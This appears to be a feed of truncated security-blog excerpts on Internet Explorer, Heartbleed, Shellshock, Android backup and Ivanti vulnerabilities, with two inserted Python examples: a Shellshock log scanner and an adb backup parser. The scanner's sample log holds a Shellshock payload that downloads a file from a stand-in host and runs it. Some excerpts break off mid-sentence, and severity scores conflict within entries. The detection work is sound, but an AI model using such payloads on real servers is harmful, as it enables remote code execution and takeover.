A description of how to trigger the MS14-066 ECDSA heap buffer overflow was posted by BeyondTrust, which also explained the research method used in narrowing down where the vulnerability presented itself. Their article mentions leveraging the OpenSSL s_client to authenticate to an IIS server, and by patching the s3_clnt.c file to fuzz the particular code path they were able to t
Unit42
Addressing CVE-2014-6332 SWF Exploit
blogs_unit42·2014-11-26·CVSS 8.8
CVE-2014-6332 [HIGH] Addressing CVE-2014-6332 SWF Exploit
## Addressing CVE-2014-6332 SWF Exploit
Palo Alto Networks
Published: November 26, 2014
Threat Research
Vulnerabilities
EMET
Endpoint
Internet Explorer
Shellcode
Continuing a recent trend in which Internet Explorer vulnerabilities are exploited using Flash, samples of an SWF purportedly used in conjunction with CVE-2014-6332 have appeared in several places. The most famous examples of this trend are the exploits for CVE-2014-0322 and CVE-2014-1776.
We have yet to encounter the SWF sample with its original exploit attached, but by looking at the SWF, it is clear that it is constructed to function with several forms of memory corruption, making the vulnerability itself less interesting. That is a great example of why our Advanced Endpoint Protection approach, which focuses on the
Unit42
Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-11-11·CVSS 6.5
[MEDIUM] Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: November 11, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities impacting IE versions 8, 9, 10 and 11. The discoveries include two IE memory corruption vulnerabilities and an IE ASLR bypass vulnerability. All three are part of the November 2014 Security Bulletin and documented in Microsoft Security Bulletin MS14-065.
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, respon
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson
Published: October 15, 2014
Threat Research
Vulnerabilities
BlackEnergy
ISight
Microsoft
Microsoft Security Bulletin
Patch Tuesday
PowerShell Empire
Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
## Sandworm
The first to drop was the Sandworm Campaign, a report from iSIGHT Partners, which described attacks on European and American t
Unit42
Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
blogs_unit42·2014-10-14·CVSS 6.5
[MEDIUM] Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
## Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
Ryan Olson
Published: October 14, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered a new critical Internet Explorer (IE) vulnerability impacting IE versions 6, 7, 8, 9 and 10. The vulnerability allows full remote code execution via a memory corruption flaw. It is documented in Microsoft Security Bulletin MS14-056 and is part of the October 2014 Security Bulletin.
In our continuing commitment to the security research community, this vulnerability was disclosed to Microsoft through our participation in the Microsoft Active Protections P
Unit42
Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
blogs_unit42·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
## Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Ryan Olson
Published: September 25, 2014
Threat Research
Vulnerabilities
Apache
Bash
CVE-2014-6271
Linux
Mac OS X
MITRE
OpenSSH
PAN-OS
Panorama
Shellshock
Unix
Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by MITRE, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.
While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security commun
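A detection check for the Shellshock signature, added here as an example and not code from the Unit 42 post. Bash before the fix imported function definitions from any environment variable whose value began with `() {` and then executed whatever followed the function body; CGI-style servers copy client-controlled request headers into the environment, which is why the prologue shows up in web access logs. The combined-format log lines, IP addresses and paths below are constructed for the example.

```python
"""Shellshock (CVE-2014-6271) request-log scanner (added example).

Scans Apache/nginx "combined" access-log lines for the bash function-definition
prologue that vulnerable bash imported from the environment, and extracts the
command tail that bash would have executed. All log lines, IPs and paths are
constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# combined log format: ip - - [ts] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# "() { <body> }; <tail>" -- matched loosely on whitespace so spacing variants
# used by scanners are caught as well; <tail> is what a vulnerable bash ran.
SHELLSHOCK = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<tail>.+)')


@dataclass(frozen=True)
class Hit:
    ip: str
    field: str   # which logged, client-controlled field carried the payload
    tail: str    # command(s) following the function body


def scan_line(line: str) -> list[Hit]:
    """Return one Hit per client-controlled field carrying a Shellshock prologue."""
    m = COMBINED.match(line)
    if not m:
        return []
    hits = []
    for field in ("req", "referer", "ua"):
        s = SHELLSHOCK.search(m.group(field))
        if s:
            hits.append(Hit(m.group("ip"), field, s.group("tail").strip()))
    return hits


def scan(lines) -> list[Hit]:
    """Scan an iterable of log lines and collect every hit in order."""
    hits: list[Hit] = []
    for line in lines:
        hits.extend(scan_line(line))
    return hits


# Constructed sample log: one payload in the User-Agent, one in the Referer,
# and one benign request in between.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:06:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'wget http://203.0.113.9/x -O /tmp/x; sh /tmp/x\'"',
    '198.51.100.4 - - [25/Sep/2014:06:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [25/Sep/2014:06:13:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() {:;}; ping -c 1 203.0.113.9" "curl/7.38.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.ip} field={h.field} tail={h.tail}")
```

Only the request line, Referer and User-Agent are visible in a combined log; other headers (Cookie, custom headers) reach the CGI environment just the same, so a full-header capture or WAF log is needed to catch payloads placed there.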
Unit42
Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-09-09
Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: September 9, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered 15 new critical Internet Explorer (IE) vulnerabilities covering IE versions 6, 7, 8, 9, 10 and 11.
Each of these discoveries allows full remote code execution using memory corruption vulnerabilities in IE. They are documented in Microsoft Security Bulletin MS14-052 and are part of the September 2014 Security Bulletin. Palo Alto Networks researcher Bo Qu is credited with these 15 vulnerabilities.
Palo Alto Networks customers are protected from these vulnerabilities through our regular Vulnerability Protection updates, and we recomme
Unit42
Examining the CHS Breach and Heartbleed Exploitation
blogs_unit42·2014-08-20·CVSS 7.5
CVE-2014-0160 [HIGH] Examining the CHS Breach and Heartbleed Exploitation
## Examining the CHS Breach and Heartbleed Exploitation
Ryan Olson
Published: August 20, 2014
Malware
Threat Research
Vulnerabilities
Community Health Systems
CVE-2014-0160
Heartbleed
OpenSSL
TrustedSec
Yesterday, TrustedSec, a security consultancy based in Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160). CHS’s 8-K filing on Monday did not reveal how the attackers got into the network, only that the records of approximately 4.5 million patients were stolen in attacks between April and June of 2014. TrustedSec reports that attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN
Unit42
Insecure Internal Storage in Android
blogs_unit42·2014-08-19
Insecure Internal Storage in Android
## Insecure Internal Storage in Android
Claud Xiao
Published: August 18, 2014
Threat Research
Vulnerabilities
ADB
Android
HITCON
Vulnerability exploit
Today, Palo Alto Networks researcher Claud Xiao is delivering a presentation titled “Insecure Internal Storage in Android” at the Hacks in Taiwan Conference ( HITCON ).
Claud is discussing techniques for accessing private data in Android’s internal storage using the Android Debug Bridge (ADB) backup/restore functionality. While over 85% of active Android devices are vulnerable to this attack, Android includes multiple levels of protection to prevent unauthorized data access. In today’s presentation, Claud demonstrates how an attacker could bypass all of those protections to gain access to usernames, passwords and
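A parser for the archive that `adb backup` produces, added here as an example and not code from the talk or from Palo Alto Networks. An unencrypted backup is a four-line text header (magic, version, compressed flag, encryption) followed by a zlib-compressed tar whose entries are laid out as `apps/<package>/<domain>/<path>`, where the domain names the private-storage area (`f` files, `db` databases, `sp` shared_prefs, `a` apk). The script builds a sample archive in memory so it runs offline; the package name `com.example.notes` and its file contents are hypothetical.

```python
"""Android 'adb backup' archive (.ab) parser and private-data exposure check.

Added example. Builds an unencrypted, compressed .ab blob in memory (the
package and contents are constructed), parses it back, and lists which
entries came out of the app's private storage domains.
"""
from __future__ import annotations

import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"
PRIVATE_DOMAINS = ("f/", "db/", "sp/")   # files, databases, shared_prefs


def build_backup(entries: dict[str, bytes], version: int = 1) -> bytes:
    """Construct an unencrypted, compressed .ab blob from {tar_path: content}."""
    raw = io.BytesIO()
    with tarfile.open(fileobj=raw, mode="w") as tar:
        for path, data in entries.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    # header lines: magic, format version, compressed=1, encryption=none
    header = b"%s\n%d\n1\nnone\n" % (MAGIC, version)
    return header + zlib.compress(raw.getvalue())


def parse_backup(blob: bytes) -> dict[str, dict[str, bytes]]:
    """Return {package: {"<domain>/<path>": content}} for every app in the archive."""
    parts = blob.split(b"\n", 4)
    if len(parts) < 5 or parts[0] != MAGIC:
        raise ValueError("not an Android backup file")
    compressed, encryption, body = parts[2] == b"1", parts[3], parts[4]
    if encryption != b"none":
        # password-protected backups are encrypted; nothing to read without the key
        raise ValueError(f"encrypted backup ({encryption.decode()})")
    payload = zlib.decompress(body) if compressed else body
    apps: dict[str, dict[str, bytes]] = {}
    with tarfile.open(fileobj=io.BytesIO(payload), mode="r:") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            pieces = member.name.split("/", 2)   # apps / <package> / <domain>/<path>
            if len(pieces) != 3 or pieces[0] != "apps":
                continue
            f = tar.extractfile(member)
            apps.setdefault(pieces[1], {})[pieces[2]] = f.read() if f else b""
    return apps


def exposed_private_data(apps: dict[str, dict[str, bytes]]) -> list[tuple[str, str]]:
    """(package, path) for every entry that came from a private storage domain.

    Files under f/, db/ or sp/ are readable only by the app's own UID on the
    device; their presence in a backup means the app let them be backed up.
    """
    return sorted((pkg, path) for pkg, files in apps.items()
                  for path in files if path.startswith(PRIVATE_DOMAINS))


# Constructed sample: an app that backed up a shared_prefs file holding a token.
SAMPLE = build_backup({
    "apps/com.example.notes/_manifest": b"com.example.notes\n1\n",
    "apps/com.example.notes/sp/session.xml":
        b'<map><string name="token">s3cr3t</string></map>',
    "apps/com.example.notes/db/notes.db": b"SQLite format 3\x00",
})

if __name__ == "__main__":
    parsed = parse_backup(SAMPLE)
    for pkg, path in exposed_private_data(parsed):
        print(f"{pkg}: {path} ({len(parsed[pkg][path])} bytes)")
```

Pointing `parse_backup` at a real file from `adb backup -f out.ab <package>` shows in one pass whether an app's session tokens or databases leave the sandbox through the backup path; an app that sets `android:allowBackup="false"` contributes no `f/`, `db/` or `sp/` entries.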
Unit42
Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-08-16·CVSS 6.5
[MEDIUM] Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: August 16, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered 3 new critical Internet Explorer (IE) vulnerabilities covering IE versions 8, 9, 10 and 11.
Each of these discoveries allows full remote code execution using a memory corruption vulnerability in IE. They are documented in Microsoft Security Bulletin MS14-051 and are part of the August 2014 Security Bulletin. Palo Alto Networks researcher Bo Qu is credited with all 3 vulnerabilities.
Palo Alto Networks customers are protected from these vulnerabilities through our regular Vulnerability Protection updates, and we recommend Internet Explo
Unit42
Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
blogs_unit42·2014-06-10·CVSS 9.3
[CRITICAL] Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
## Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
Ryan Olson
Published: June 10, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Patch Tuesday
Today, Microsoft patched 59 Internet Explorer vulnerabilities, 21 of them discovered by Palo Alto Networks researchers. Palo Alto Networks is committed not only to detecting attacks, but preventing them as well.
Our internal research team discovered each of these 21 vulnerabilities and reported them to Microsoft so they could begin building and testing patches. Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35. We want to acknowledge Palo Alto Networks researchers Bo Qu, Hui Gao, Royc
Unit42
A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
blogs_unit42·2014-05-02·CVSS 8.8
CVE-2014-1776 [HIGH] A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
## A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
Bo Qu
Published: May 2, 2014
High Profile Threats
Threat Research
Vulnerabilities
CVE-2014-1776
Internet Explorer
Microsoft
## Summary
- The exploit code used in the recent CVE-2014-1776 attacks shares many characteristics with code that exploited CVE-2014-0322 and CVE-2013-3163.
- The shared techniques, variable names and code structure suggest these exploits share a common author or template.
- Palo Alto Networks customers are protected from exploitation of CVE-2014-1776 with content release 433-2194.
Late last month reports surfaced that a new Internet Explorer vulnerability (CVE-2014-1776) was being exploited in targeted attacks. The vulnerability allows an attacker to take full contr
Unit42
Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
blogs_unit42·2014-04-29·CVSS 9.8
CVE-2014-1776 [CRITICAL] Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
## Palo Alto Networks Protects Customers From Critical IE Vulnerability CVE-2014-1776
Scott Simkin
Published: April 29, 2014
High Profile Threats
Threat Research
Vulnerabilities
CVE-2014-1776
Cyvera
Internet Explorer
Microsoft
## Summary
- Critical vulnerability (CVE-2014-1776) identified in Internet Explorer, with active attacks observed in the wild
- The vulnerability could be used to exploit multiple versions of Internet Explorer, including those on Windows XP-based systems, which no longer receive security updates from Microsoft
- Palo Alto Networks Threat Prevention customers are protected from exploitation of the vulnerability
- The Cyvera endpoint solution specializes in preventing the type of exploitation behavior used in this attack
On Saturday, Microsoft disclosed a critic
Unit42
8 Tips For Dealing With Heartbleed Right Now
blogs_unit42·2014-04-12·CVSS 7.5
CVE-2014-0160 [HIGH] 8 Tips For Dealing With Heartbleed Right Now
## 8 Tips For Dealing With Heartbleed Right Now
Rick Howard
Published: April 12, 2014
High Profile Threats
Vulnerabilities
CVE-2014-0160
Heartbleed
OpenSSL
This has been a fun week. We have not had a significant cyber event like this, something that affects just about everybody on the Internet, since the Kaminsky DNS vulnerability of 2008. Everybody I know has been scrambling to understand what it means to their organization, to their business and to their immediate family. Yes, I said family. I am sure I am not the only one who has answered a question or two from his mother-in-law about how the Internet is melting down based on what she’s been reading in the press.
There’s a lot out there already about what Heartbleed means for the Web and beyond, and I’ll point you to our o
Wiz
CVE-2026-1281 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-1281 [HIGH] CVE-2026-1281 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1281: Ivanti Endpoint Manager Mobile vulnerability analysis and mitigation
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Source: NVD

| Field | Value |
|---|---|
| Score | 9.8 |
| Published | January 29, 2026 |
| Severity | CRITICAL |
| CNA Score | 9.8 |
| High-profile Vulnerability | Yes |
| Affected Technologies | Ivanti Endpoint Manager Mobile |
| Has Public Exploit | Yes |
| Has CISA KEV Exploit | Yes |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 98.7 |
| Exploitation Probability (EPSS) | 71.8 |

Affected packages and libraries: cpe:2.3:a:ivanti:endpoint_manager_mobile

Sources

| Source | Severity | Fix status | Added at |
|---|---|---|---|
| Linux | CRITICAL | Has Fix | Jan 30, 2026 |
| Linux | CRITICAL | Has Fix | Feb 02, 2026 |
Wiz
CVE-2026-1340 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-1340 [HIGH] CVE-2026-1340 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1340: Ivanti Endpoint Manager Mobile vulnerability analysis and mitigation
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Source: NVD

| Field | Value |
|---|---|
| Score | 9.8 |
| Published | January 29, 2026 |
| Severity | CRITICAL |
| CNA Score | 9.8 |
| High-profile Vulnerability | Yes |
| Affected Technologies | Ivanti Endpoint Manager Mobile |
| Has Public Exploit | Yes |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 98.6 |
| Exploitation Probability (EPSS) | 67.7 |

Affected packages and libraries: cpe:2.3:a:ivanti:endpoint_manager_mobile

Sources

| Source | Severity | Fix status | Added at |
|---|---|---|---|
| Linux | CRITICAL | Has Fix | Feb 17, 2026 |
Recorded Future
January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future·CVSS 4.9
[MEDIUM] January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
# January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
- APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
- Microsoft and SmarterTools lead concerns: These vendors accounte
Timeline
- 2026-01-29: Published
- 2026-04-08: Added to CISA KEV
- Exploited in the wild